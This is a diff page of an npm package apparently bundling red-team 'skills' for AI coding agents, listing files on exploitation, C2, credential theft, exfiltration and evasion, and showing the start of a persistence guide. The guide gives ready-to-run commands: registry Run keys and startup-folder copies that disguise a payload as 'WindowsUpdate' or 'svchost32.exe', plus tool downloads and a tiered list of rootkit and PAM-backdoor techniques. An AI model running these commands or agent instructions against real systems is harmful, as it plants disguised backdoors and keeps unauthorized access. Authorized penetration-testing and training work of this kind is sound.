rtexit-method 0.1.0 → 0.1.2
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/package.json +9 -7
- package/packaged-assets/.agents/skills/rt-active-recon/SKILL.md +767 -0
- package/packaged-assets/.agents/skills/rt-active-recon/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-agent-breaker/SKILL.md +65 -0
- package/packaged-assets/.agents/skills/rt-agent-breaker/customize.toml +76 -0
- package/packaged-assets/.agents/skills/rt-agent-commander/SKILL.md +63 -0
- package/packaged-assets/.agents/skills/rt-agent-commander/customize.toml +67 -0
- package/packaged-assets/.agents/skills/rt-agent-ghost/SKILL.md +65 -0
- package/packaged-assets/.agents/skills/rt-agent-ghost/customize.toml +77 -0
- package/packaged-assets/.agents/skills/rt-agent-navigator/SKILL.md +62 -0
- package/packaged-assets/.agents/skills/rt-agent-navigator/customize.toml +61 -0
- package/packaged-assets/.agents/skills/rt-agent-phantom/SKILL.md +62 -0
- package/packaged-assets/.agents/skills/rt-agent-phantom/customize.toml +62 -0
- package/packaged-assets/.agents/skills/rt-agent-scout/SKILL.md +62 -0
- package/packaged-assets/.agents/skills/rt-agent-scout/customize.toml +61 -0
- package/packaged-assets/.agents/skills/rt-agent-scribe/SKILL.md +65 -0
- package/packaged-assets/.agents/skills/rt-agent-scribe/customize.toml +77 -0
- package/packaged-assets/.agents/skills/rt-attack-chain-builder/SKILL.md +476 -0
- package/packaged-assets/.agents/skills/rt-attack-chain-builder/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-attack-surface-map/SKILL.md +1209 -0
- package/packaged-assets/.agents/skills/rt-attack-surface-map/template.md +62 -0
- package/packaged-assets/.agents/skills/rt-autodoc/SKILL.md +258 -0
- package/packaged-assets/.agents/skills/rt-c2-operations/SKILL.md +1072 -0
- package/packaged-assets/.agents/skills/rt-c2-operations/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-compliance-mapper/SKILL.md +773 -0
- package/packaged-assets/.agents/skills/rt-create-sead/SKILL.md +74 -0
- package/packaged-assets/.agents/skills/rt-create-sead/template.md +89 -0
- package/packaged-assets/.agents/skills/rt-create-sead/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-credential-access/SKILL.md +756 -0
- package/packaged-assets/.agents/skills/rt-credential-hunt/SKILL.md +856 -0
- package/packaged-assets/.agents/skills/rt-credential-hunt/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-cvss-calculator/SKILL.md +542 -0
- package/packaged-assets/.agents/skills/rt-cvss-calculator/cvss4-matrix.csv +20 -0
- package/packaged-assets/.agents/skills/rt-data-exfiltration/SKILL.md +784 -0
- package/packaged-assets/.agents/skills/rt-defense-evasion/SKILL.md +987 -0
- package/packaged-assets/.agents/skills/rt-evidence-chain/SKILL.md +712 -0
- package/packaged-assets/.agents/skills/rt-evidence-chain/template.md +31 -0
- package/packaged-assets/.agents/skills/rt-executive-report/SKILL.md +718 -0
- package/packaged-assets/.agents/skills/rt-executive-report/template.md +38 -0
- package/packaged-assets/.agents/skills/rt-executive-report/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-exploit-active-directory/SKILL.md +1078 -0
- package/packaged-assets/.agents/skills/rt-exploit-active-directory/ad-checklist.csv +12 -0
- package/packaged-assets/.agents/skills/rt-exploit-active-directory/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-exploit-android/SKILL.md +1329 -0
- package/packaged-assets/.agents/skills/rt-exploit-android/masvs-checklist.csv +10 -0
- package/packaged-assets/.agents/skills/rt-exploit-android/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-exploit-api/SKILL.md +1547 -0
- package/packaged-assets/.agents/skills/rt-exploit-api/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-exploit-auth/SKILL.md +1949 -0
- package/packaged-assets/.agents/skills/rt-exploit-auth/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-exploit-bec/SKILL.md +69 -0
- package/packaged-assets/.agents/skills/rt-exploit-cloud-aws/SKILL.md +865 -0
- package/packaged-assets/.agents/skills/rt-exploit-cloud-aws/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-exploit-cloud-azure/SKILL.md +1258 -0
- package/packaged-assets/.agents/skills/rt-exploit-cloud-gcp/SKILL.md +981 -0
- package/packaged-assets/.agents/skills/rt-exploit-containers/SKILL.md +55 -0
- package/packaged-assets/.agents/skills/rt-exploit-databases/SKILL.md +1374 -0
- package/packaged-assets/.agents/skills/rt-exploit-desktop-mac/SKILL.md +834 -0
- package/packaged-assets/.agents/skills/rt-exploit-desktop-win/SKILL.md +903 -0
- package/packaged-assets/.agents/skills/rt-exploit-desktop-win/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-exploit-dotnet/SKILL.md +945 -0
- package/packaged-assets/.agents/skills/rt-exploit-elasticsearch/SKILL.md +68 -0
- package/packaged-assets/.agents/skills/rt-exploit-electron/SKILL.md +1023 -0
- package/packaged-assets/.agents/skills/rt-exploit-electron/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-exploit-file-upload/SKILL.md +1576 -0
- package/packaged-assets/.agents/skills/rt-exploit-file-upload/payloads/README.md +4 -0
- package/packaged-assets/.agents/skills/rt-exploit-file-upload/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-exploit-firebase/SKILL.md +54 -0
- package/packaged-assets/.agents/skills/rt-exploit-frameworks/SKILL.md +967 -0
- package/packaged-assets/.agents/skills/rt-exploit-idor/SKILL.md +1693 -0
- package/packaged-assets/.agents/skills/rt-exploit-idor/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-exploit-injection/SKILL.md +1860 -0
- package/packaged-assets/.agents/skills/rt-exploit-injection/payloads/sqlmap-tampers.txt +22 -0
- package/packaged-assets/.agents/skills/rt-exploit-injection/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-exploit-ios/SKILL.md +1214 -0
- package/packaged-assets/.agents/skills/rt-exploit-ios/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-exploit-iot/SKILL.md +91 -0
- package/packaged-assets/.agents/skills/rt-exploit-iot/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-exploit-java/SKILL.md +1009 -0
- package/packaged-assets/.agents/skills/rt-exploit-jwt/SKILL.md +1327 -0
- package/packaged-assets/.agents/skills/rt-exploit-jwt/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-exploit-mongodb/SKILL.md +67 -0
- package/packaged-assets/.agents/skills/rt-exploit-mssql/SKILL.md +52 -0
- package/packaged-assets/.agents/skills/rt-exploit-mysql/SKILL.md +53 -0
- package/packaged-assets/.agents/skills/rt-exploit-network/SKILL.md +118 -0
- package/packaged-assets/.agents/skills/rt-exploit-network/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-exploit-nodejs/SKILL.md +852 -0
- package/packaged-assets/.agents/skills/rt-exploit-osticket/SKILL.md +63 -0
- package/packaged-assets/.agents/skills/rt-exploit-phishing/SKILL.md +173 -0
- package/packaged-assets/.agents/skills/rt-exploit-phishing/templates/README.md +4 -0
- package/packaged-assets/.agents/skills/rt-exploit-phishing/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-exploit-php/SKILL.md +1119 -0
- package/packaged-assets/.agents/skills/rt-exploit-physical/SKILL.md +63 -0
- package/packaged-assets/.agents/skills/rt-exploit-physical/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-exploit-postgresql/SKILL.md +67 -0
- package/packaged-assets/.agents/skills/rt-exploit-python/SKILL.md +986 -0
- package/packaged-assets/.agents/skills/rt-exploit-redis/SKILL.md +68 -0
- package/packaged-assets/.agents/skills/rt-exploit-ruby/SKILL.md +61 -0
- package/packaged-assets/.agents/skills/rt-exploit-scada/SKILL.md +1091 -0
- package/packaged-assets/.agents/skills/rt-exploit-ssrf/SKILL.md +1528 -0
- package/packaged-assets/.agents/skills/rt-exploit-ssrf/payloads.txt +23 -0
- package/packaged-assets/.agents/skills/rt-exploit-ssrf/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-exploit-vishing/SKILL.md +121 -0
- package/packaged-assets/.agents/skills/rt-exploit-vishing/scripts.md +4 -0
- package/packaged-assets/.agents/skills/rt-exploit-web/SKILL.md +1902 -0
- package/packaged-assets/.agents/skills/rt-exploit-web/owasp-checklist.csv +14 -0
- package/packaged-assets/.agents/skills/rt-exploit-web/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-exploit-wireless/SKILL.md +71 -0
- package/packaged-assets/.agents/skills/rt-exploit-wordpress/SKILL.md +1565 -0
- package/packaged-assets/.agents/skills/rt-exploit-wordpress/cves.csv +7 -0
- package/packaged-assets/.agents/skills/rt-exploit-wordpress/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-exploit-xss/SKILL.md +1526 -0
- package/packaged-assets/.agents/skills/rt-exploit-xss/payloads.txt +18 -0
- package/packaged-assets/.agents/skills/rt-exploit-xss/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-finding-document/SKILL.md +687 -0
- package/packaged-assets/.agents/skills/rt-finding-document/template.md +71 -0
- package/packaged-assets/.agents/skills/rt-finding-document/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-finding-tracker/SKILL.md +216 -0
- package/packaged-assets/.agents/skills/rt-finding-tracker/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-help/SKILL.md +292 -0
- package/packaged-assets/.agents/skills/rt-help/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-js-analysis/SKILL.md +639 -0
- package/packaged-assets/.agents/skills/rt-js-analysis/patterns.txt +27 -0
- package/packaged-assets/.agents/skills/rt-js-analysis/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-kill-chain-map/SKILL.md +393 -0
- package/packaged-assets/.agents/skills/rt-lateral-movement/SKILL.md +1032 -0
- package/packaged-assets/.agents/skills/rt-lateral-movement/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-methodology-selector/SKILL.md +69 -0
- package/packaged-assets/.agents/skills/rt-methodology-selector/frameworks.csv +10 -0
- package/packaged-assets/.agents/skills/rt-methodology-selector/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-mitre-map/SKILL.md +668 -0
- package/packaged-assets/.agents/skills/rt-mitre-map/tactics.csv +16 -0
- package/packaged-assets/.agents/skills/rt-mitre-map/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-osint/SKILL.md +775 -0
- package/packaged-assets/.agents/skills/rt-osint/osint-sources.csv +12 -0
- package/packaged-assets/.agents/skills/rt-osint/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-party-mode/SKILL.md +249 -0
- package/packaged-assets/.agents/skills/rt-party-mode/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-persistence/SKILL.md +1146 -0
- package/packaged-assets/.agents/skills/rt-persistence/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-poc-writer/SKILL.md +640 -0
- package/packaged-assets/.agents/skills/rt-post-exploitation/SKILL.md +998 -0
- package/packaged-assets/.agents/skills/rt-post-exploitation/linux-checklist.csv +10 -0
- package/packaged-assets/.agents/skills/rt-post-exploitation/windows-checklist.csv +10 -0
- package/packaged-assets/.agents/skills/rt-post-exploitation/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-privilege-escalation/SKILL.md +1027 -0
- package/packaged-assets/.agents/skills/rt-privilege-escalation/linux-checklist.csv +10 -0
- package/packaged-assets/.agents/skills/rt-privilege-escalation/win-checklist.csv +10 -0
- package/packaged-assets/.agents/skills/rt-privilege-escalation/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-remediation-roadmap/SKILL.md +665 -0
- package/packaged-assets/.agents/skills/rt-remediation-roadmap/template.md +28 -0
- package/packaged-assets/.agents/skills/rt-risk-matrix/SKILL.md +232 -0
- package/packaged-assets/.agents/skills/rt-rules-of-engagement/SKILL.md +62 -0
- package/packaged-assets/.agents/skills/rt-rules-of-engagement/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-scenario-c001/SKILL.md +71 -0
- package/packaged-assets/.agents/skills/rt-scenario-c002/SKILL.md +69 -0
- package/packaged-assets/.agents/skills/rt-scenario-c003/SKILL.md +71 -0
- package/packaged-assets/.agents/skills/rt-scenario-c004/SKILL.md +71 -0
- package/packaged-assets/.agents/skills/rt-scenario-c005/SKILL.md +72 -0
- package/packaged-assets/.agents/skills/rt-scenario-d001/SKILL.md +378 -0
- package/packaged-assets/.agents/skills/rt-scenario-d002/SKILL.md +392 -0
- package/packaged-assets/.agents/skills/rt-scenario-d003/SKILL.md +522 -0
- package/packaged-assets/.agents/skills/rt-scenario-d004/SKILL.md +373 -0
- package/packaged-assets/.agents/skills/rt-scenario-d005/SKILL.md +458 -0
- package/packaged-assets/.agents/skills/rt-scenario-library/SKILL.md +292 -0
- package/packaged-assets/.agents/skills/rt-scenario-library/scenarios.csv +32 -0
- package/packaged-assets/.agents/skills/rt-scenario-m001/SKILL.md +796 -0
- package/packaged-assets/.agents/skills/rt-scenario-m002/SKILL.md +723 -0
- package/packaged-assets/.agents/skills/rt-scenario-m003/SKILL.md +463 -0
- package/packaged-assets/.agents/skills/rt-scenario-m004/SKILL.md +449 -0
- package/packaged-assets/.agents/skills/rt-scenario-m005/SKILL.md +505 -0
- package/packaged-assets/.agents/skills/rt-scenario-n001/SKILL.md +573 -0
- package/packaged-assets/.agents/skills/rt-scenario-n002/SKILL.md +112 -0
- package/packaged-assets/.agents/skills/rt-scenario-n003/SKILL.md +100 -0
- package/packaged-assets/.agents/skills/rt-scenario-n004/SKILL.md +90 -0
- package/packaged-assets/.agents/skills/rt-scenario-n005/SKILL.md +71 -0
- package/packaged-assets/.agents/skills/rt-scenario-w001/SKILL.md +635 -0
- package/packaged-assets/.agents/skills/rt-scenario-w002/SKILL.md +612 -0
- package/packaged-assets/.agents/skills/rt-scenario-w003/SKILL.md +449 -0
- package/packaged-assets/.agents/skills/rt-scenario-w004/SKILL.md +648 -0
- package/packaged-assets/.agents/skills/rt-scenario-w005/SKILL.md +479 -0
- package/packaged-assets/.agents/skills/rt-scenario-w006/SKILL.md +443 -0
- package/packaged-assets/.agents/skills/rt-scenario-w007/SKILL.md +494 -0
- package/packaged-assets/.agents/skills/rt-scenario-w008/SKILL.md +576 -0
- package/packaged-assets/.agents/skills/rt-scenario-w009/SKILL.md +518 -0
- package/packaged-assets/.agents/skills/rt-scenario-w010/SKILL.md +574 -0
- package/packaged-assets/.agents/skills/rt-scope-definition/SKILL.md +79 -0
- package/packaged-assets/.agents/skills/rt-scope-definition/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-shodan-recon/SKILL.md +880 -0
- package/packaged-assets/.agents/skills/rt-status/SKILL.md +64 -0
- package/packaged-assets/.agents/skills/rt-subdomain-enum/SKILL.md +906 -0
- package/packaged-assets/.agents/skills/rt-subdomain-enum/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-technical-report/SKILL.md +710 -0
- package/packaged-assets/.agents/skills/rt-technical-report/template.md +41 -0
- package/packaged-assets/.agents/skills/rt-technical-report/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-threat-model/SKILL.md +59 -0
- package/packaged-assets/.agents/skills/rt-threat-model/template.md +32 -0
- package/packaged-assets/.agents/skills/rt-threat-model/workflow.md +68 -0
- package/packaged-assets/.agents/skills/rt-timeline/SKILL.md +338 -0
- package/packaged-assets/RTEXIT.md +127 -0
- package/tools/installer/commands/install.js +0 -1
- package/tools/installer/lib/asset-manifest.js +10 -5
- package/tools/installer/lib/banner.js +14 -6
- package/tools/installer/lib/copy-assets.js +5 -2
- package/tools/installer/lib/prompts.js +1 -11
- package/tools/installer/lib/write-config.js +8 -2
- /package/{_rtexit → packaged-assets/_rtexit}/config.toml +0 -0
- /package/{_rtexit → packaged-assets/_rtexit}/config.user.toml +0 -0
- /package/{_rtexit → packaged-assets/_rtexit}/custom/config.toml +0 -0
- /package/{_rtexit → packaged-assets/_rtexit}/scripts/autodoc_engine.py +0 -0
- /package/{_rtexit → packaged-assets/_rtexit}/scripts/finding_tracker.py +0 -0
- /package/{_rtexit → packaged-assets/_rtexit}/scripts/resolve_config.py +0 -0
- /package/{_rtexit → packaged-assets/_rtexit}/scripts/resolve_customization.py +0 -0
- /package/{resources → packaged-assets/resources}/certifications.md +0 -0
- /package/{resources → packaged-assets/resources}/payloads.md +0 -0
- /package/{resources → packaged-assets/resources}/tools.md +0 -0
- /package/{resources → packaged-assets/resources}/wordlists.md +0 -0
- /package/{templates → packaged-assets/templates}/attack-chain-template.md +0 -0
- /package/{templates → packaged-assets/templates}/executive-report-template.md +0 -0
- /package/{templates → packaged-assets/templates}/executive-report.md +0 -0
- /package/{templates → packaged-assets/templates}/finding-template.md +0 -0
- /package/{templates → packaged-assets/templates}/remediation-roadmap.md +0 -0
- /package/{templates → packaged-assets/templates}/sead-template.md +0 -0
- /package/{templates → packaged-assets/templates}/technical-report.md +0 -0
|
@@ -0,0 +1,1146 @@
|
|
|
1
|
+
---
|
|
2
|
+
name: rt-persistence
|
|
3
|
+
description: "Persistence mechanisms skill. Windows: Registry Run keys (HKCU/HKLM), scheduled tasks with schtasks, Windows service installation, WMI event subscriptions, DLL hijacking for persistence, COM hijacking, startup folder. Linux: cron jobs, ~/.bashrc/.profile poisoning, SSH authorized_keys backdoor, systemd service units, LD_PRELOAD persistence. Web: WordPress Application Password backdoor (from Almentor engagement). Documents cleanup procedures."
|
|
4
|
+
---
|
|
5
|
+
|
|
6
|
+
# rt-persistence — Persistence Mechanisms Skill Guide
|
|
7
|
+
|
|
8
|
+
## 1. Overview and When to Use
|
|
9
|
+
|
|
10
|
+
Persistence is the art of maintaining access to a compromised system across reboots, user logouts, and credential rotations. Once initial access is achieved, operators must establish durable footholds before the window closes. This skill covers the full spectrum from trivial beginner registry keys to expert-level fileless WMI subscriptions.
|
|
11
|
+
|
|
12
|
+
**Use this skill when:**
|
|
13
|
+
- Initial foothold is established and you need to survive a reboot
|
|
14
|
+
- Credentials are likely to be rotated during the engagement
|
|
15
|
+
- The engagement scope allows for persistence (confirm with Rules of Engagement)
|
|
16
|
+
- You need multiple independent channels in case one is burned
|
|
17
|
+
- Establishing long-haul C2 before a noisy lateral movement phase
|
|
18
|
+
|
|
19
|
+
**Do NOT use when:**
|
|
20
|
+
- Rules of Engagement explicitly prohibit persistence
|
|
21
|
+
- On production systems where a reboot-safe implant would disrupt services
|
|
22
|
+
- Time-boxed assessments where cleanup risk outweighs benefit
|
|
23
|
+
|
|
24
|
+
**Engagement context (Almentor):** WordPress Application Password backdoor was validated in the Almentor engagement. Use that technique when web server access is confirmed and wp-cli or direct DB access is available.
|
|
25
|
+
|
|
26
|
+
---
|
|
27
|
+
|
|
28
|
+
## 2. Prerequisites and Tool Setup
|
|
29
|
+
|
|
30
|
+
### 2.1 Operator Machine (Kali Linux)
|
|
31
|
+
|
|
32
|
+
```bash
|
|
33
|
+
# Update base system
|
|
34
|
+
sudo apt update && sudo apt upgrade -y
|
|
35
|
+
|
|
36
|
+
# Metasploit Framework (persistence modules)
|
|
37
|
+
sudo apt install -y metasploit-framework
|
|
38
|
+
|
|
39
|
+
# Impacket suite (WMI, service-based persistence)
|
|
40
|
+
sudo apt install -y python3-impacket impacket-scripts
|
|
41
|
+
# OR from source for latest:
|
|
42
|
+
pip3 install impacket
|
|
43
|
+
|
|
44
|
+
# Evil-WinRM (Windows remote management)
|
|
45
|
+
sudo gem install evil-winrm
|
|
46
|
+
|
|
47
|
+
# CrackMapExec (lateral movement + persistence helpers)
|
|
48
|
+
sudo apt install -y crackmapexec
|
|
49
|
+
# OR pipx:
|
|
50
|
+
pipx install crackmapexec
|
|
51
|
+
|
|
52
|
+
# PowerSploit / PowerView (download manually — not in apt)
|
|
53
|
+
git clone https://github.com/PowerShellMafia/PowerSploit /opt/PowerSploit
|
|
54
|
+
|
|
55
|
+
# SharPersist (compiled .NET persistence tool)
|
|
56
|
+
# Download release from GitHub:
|
|
57
|
+
wget https://github.com/mandiant/SharPersist/releases/latest/download/SharPersist.exe -O /opt/SharPersist.exe
|
|
58
|
+
|
|
59
|
+
# SharpWMI (WMI event subscription)
|
|
60
|
+
git clone https://github.com/GhostPack/SharpWMI /opt/SharpWMI
|
|
61
|
+
|
|
62
|
+
# Veil / msfvenom (payload generation)
|
|
63
|
+
sudo apt install -y veil
|
|
64
|
+
|
|
65
|
+
# Python HTTP server (payload hosting)
|
|
66
|
+
# Built-in: python3 -m http.server
|
|
67
|
+
|
|
68
|
+
# nc / ncat (listener)
|
|
69
|
+
sudo apt install -y ncat
|
|
70
|
+
|
|
71
|
+
# Chisel (tunneling, useful for reverse callbacks)
|
|
72
|
+
wget https://github.com/jpillora/chisel/releases/latest/download/chisel_linux_amd64.gz -O /tmp/chisel.gz
|
|
73
|
+
gunzip /tmp/chisel.gz && chmod +x /tmp/chisel && sudo mv /tmp/chisel /opt/chisel
|
|
74
|
+
|
|
75
|
+
# wp-cli (WordPress backdoor — run on attacker or pivot)
|
|
76
|
+
curl -O https://raw.githubusercontent.com/wp-cli/builds/gh-pages/phar/wp-cli.phar
|
|
77
|
+
chmod +x wp-cli.phar && sudo mv wp-cli.phar /usr/local/bin/wp
|
|
78
|
+
```
|
|
79
|
+
|
|
80
|
+
### 2.2 Target Requirements by Technique
|
|
81
|
+
|
|
82
|
+
| Technique | OS | Privilege Required | Notes |
|
|
83
|
+
|---|---|---|---|
|
|
84
|
+
| HKCU Registry Run | Windows | User | Silent, common |
|
|
85
|
+
| HKLM Registry Run | Windows | Admin | More durable |
|
|
86
|
+
| Schtasks (user) | Windows | User | Runs in user context |
|
|
87
|
+
| Schtasks (SYSTEM) | Windows | Admin | Runs as SYSTEM |
|
|
88
|
+
| Windows Service | Windows | Admin/SYSTEM | Survives reboots |
|
|
89
|
+
| WMI Subscription | Windows | Admin | Fileless option |
|
|
90
|
+
| DLL Hijacking | Windows | User/Admin | App-dependent |
|
|
91
|
+
| COM Hijacking | Windows | User | HKCU COM override |
|
|
92
|
+
| Startup Folder | Windows | User | GUI session needed |
|
|
93
|
+
| Cron (user) | Linux | User | User context |
|
|
94
|
+
| ~/.bashrc | Linux | User | Interactive shell only |
|
|
95
|
+
| authorized_keys | Linux | User | SSH access needed |
|
|
96
|
+
| systemd unit | Linux | Root (system) | User units: user |
|
|
97
|
+
| LD_PRELOAD | Linux | Root (system units) | Stealthy |
|
|
98
|
+
| WP App Password | Web | WP Admin | WordPress only |
|
|
99
|
+
|
|
100
|
+
---
|
|
101
|
+
|
|
102
|
+
## 3. Skill Levels
|
|
103
|
+
|
|
104
|
+
### BEGINNER — Low-Friction, High-Detection Techniques
|
|
105
|
+
|
|
106
|
+
Suitable for learning, CTFs, or engagements where stealth is not the primary concern.
|
|
107
|
+
|
|
108
|
+
**Techniques:**
|
|
109
|
+
- HKCU Registry Run keys
|
|
110
|
+
- Windows Startup folder
|
|
111
|
+
- Linux user cron jobs
|
|
112
|
+
- ~/.bashrc poisoning
|
|
113
|
+
- WordPress Application Password
|
|
114
|
+
|
|
115
|
+
**Profile:** Detectable by basic AV and EDR. Acceptable on poorly-monitored internal networks. Always clean up.
|
|
116
|
+
|
|
117
|
+
---
|
|
118
|
+
|
|
119
|
+
### INTERMEDIATE — Blended Native + Scripted Techniques
|
|
120
|
+
|
|
121
|
+
Suitable for enterprise engagements with moderate security maturity.
|
|
122
|
+
|
|
123
|
+
**Techniques:**
|
|
124
|
+
- HKLM Registry Run (requires privilege)
|
|
125
|
+
- Scheduled tasks (schtasks) with encoded payloads
|
|
126
|
+
- SSH authorized_keys backdoor
|
|
127
|
+
- systemd user/system service units
|
|
128
|
+
- COM hijacking (HKCU)
|
|
129
|
+
|
|
130
|
+
**Profile:** May evade basic EDR. Harder to spot in log reviews. Survives most blue team triage.
|
|
131
|
+
|
|
132
|
+
---
|
|
133
|
+
|
|
134
|
+
### ADVANCED — Evasion-Focused, LOL-Bins
|
|
135
|
+
|
|
136
|
+
Suitable for mature enterprise targets, red team exercises with active SOC.
|
|
137
|
+
|
|
138
|
+
**Techniques:**
|
|
139
|
+
- WMI event subscriptions (permanent, fileless options)
|
|
140
|
+
- DLL hijacking (search order abuse)
|
|
141
|
+
- LD_PRELOAD shared library injection
|
|
142
|
+
- Scheduled tasks using XML templates to masquerade as system tasks
|
|
143
|
+
- Registry-based DLL loading (AppInit_DLLs, Image File Execution Options)
|
|
144
|
+
|
|
145
|
+
**Profile:** Requires deep understanding of target environment. Will evade most SIEM rules unless they have specific WMI/DLL monitoring.
|
|
146
|
+
|
|
147
|
+
---
|
|
148
|
+
|
|
149
|
+
### EXPERT — Fileless, Kernel-Adjacent, Anti-Forensic
|
|
150
|
+
|
|
151
|
+
For full adversary simulation against hardened targets with mature detection.
|
|
152
|
+
|
|
153
|
+
**Techniques:**
|
|
154
|
+
- WMI fileless subscription (payload in WMI repository, no file on disk)
|
|
155
|
+
- COM object hijacking with in-memory reflective DLL
|
|
156
|
+
- Boot/pre-OS persistence (bootkit concepts — scope-dependent)
|
|
157
|
+
- Shadow credentials / ADDS-based persistence (machine account cert)
|
|
158
|
+
- Golden Ticket / Silver Ticket as persistence-equivalent
|
|
159
|
+
- LAPS bypass for persistent admin access
|
|
160
|
+
- Linux kernel module rootkit (lkm-rootkit, Diamorphine)
|
|
161
|
+
- PAM backdoor (Linux authentication layer)
|
|
162
|
+
|
|
163
|
+
**Profile:** Forensically resistant. Requires custom tooling. Clean-up is complex and must be planned before deployment.
|
|
164
|
+
|
|
165
|
+
---
|
|
166
|
+
|
|
167
|
+
## 4. Step-by-Step Attack Workflow
|
|
168
|
+
|
|
169
|
+
```
|
|
170
|
+
[1] Confirm Foothold
|
|
171
|
+
|
|
|
172
|
+
v
|
|
173
|
+
[2] Enumerate Privilege Level
|
|
174
|
+
|
|
|
175
|
+
v
|
|
176
|
+
[3] Select Persistence Tier (match privilege to technique)
|
|
177
|
+
|
|
|
178
|
+
v
|
|
179
|
+
[4] Generate / Stage Payload
|
|
180
|
+
|
|
|
181
|
+
v
|
|
182
|
+
[5] Deploy Persistence Mechanism
|
|
183
|
+
|
|
|
184
|
+
v
|
|
185
|
+
[6] Verify (reboot simulation or trigger test)
|
|
186
|
+
|
|
|
187
|
+
v
|
|
188
|
+
[7] Document (screenshot, command log, artefact hash)
|
|
189
|
+
|
|
|
190
|
+
v
|
|
191
|
+
[8] Notify team lead / log in engagement tracker
|
|
192
|
+
|
|
|
193
|
+
v
|
|
194
|
+
[9] Proceed with objectives
|
|
195
|
+
|
|
|
196
|
+
v
|
|
197
|
+
[10] CLEANUP (on engagement end — mandatory)
|
|
198
|
+
```
|
|
199
|
+
|
|
200
|
+
---
|
|
201
|
+
|
|
202
|
+
## 5. Terminal Commands — Kali Linux Operator
|
|
203
|
+
|
|
204
|
+
### 5.1 Windows Persistence (via C2 / Evil-WinRM / meterpreter shell)
|
|
205
|
+
|
|
206
|
+
#### 5.1.1 Registry Run Keys (BEGINNER)
|
|
207
|
+
|
|
208
|
+
```cmd
|
|
209
|
+
:: HKCU — User-level, no admin needed
|
|
210
|
+
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" ^
|
|
211
|
+
/v "WindowsUpdate" /t REG_SZ ^
|
|
212
|
+
/d "C:\Users\Public\svchost32.exe" /f
|
|
213
|
+
|
|
214
|
+
:: HKLM — System-level, requires admin
|
|
215
|
+
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" ^
|
|
216
|
+
/v "SecurityHealth" /t REG_SZ ^
|
|
217
|
+
/d "C:\Windows\Temp\svchost32.exe" /f
|
|
218
|
+
|
|
219
|
+
:: Verify
|
|
220
|
+
reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Run"
|
|
221
|
+
reg query "HKLM\Software\Microsoft\Windows\CurrentVersion\Run"
|
|
222
|
+
|
|
223
|
+
:: Cleanup
|
|
224
|
+
reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsUpdate" /f
|
|
225
|
+
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
|
|
226
|
+
```
|
|
227
|
+
|
|
228
|
+
**PowerShell equivalent:**
|
|
229
|
+
```powershell
|
|
230
|
+
# HKCU Run key via PowerShell
|
|
231
|
+
Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" `
|
|
232
|
+
-Name "WindowsUpdate" `
|
|
233
|
+
-Value "C:\Users\Public\svchost32.exe"
|
|
234
|
+
|
|
235
|
+
# Cleanup
|
|
236
|
+
Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" `
|
|
237
|
+
-Name "WindowsUpdate"
|
|
238
|
+
```
|
|
239
|
+
|
|
240
|
+
#### 5.1.2 Startup Folder (BEGINNER)
|
|
241
|
+
|
|
242
|
+
```cmd
|
|
243
|
+
:: User startup folder
|
|
244
|
+
copy C:\Users\Public\payload.exe "C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowsUpdate.exe"
|
|
245
|
+
|
|
246
|
+
:: All-users startup (requires admin)
|
|
247
|
+
copy C:\Users\Public\payload.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\SecurityScan.exe"
|
|
248
|
+
|
|
249
|
+
:: Cleanup
|
|
250
|
+
del "C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowsUpdate.exe"
|
|
251
|
+
del "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\SecurityScan.exe"
|
|
252
|
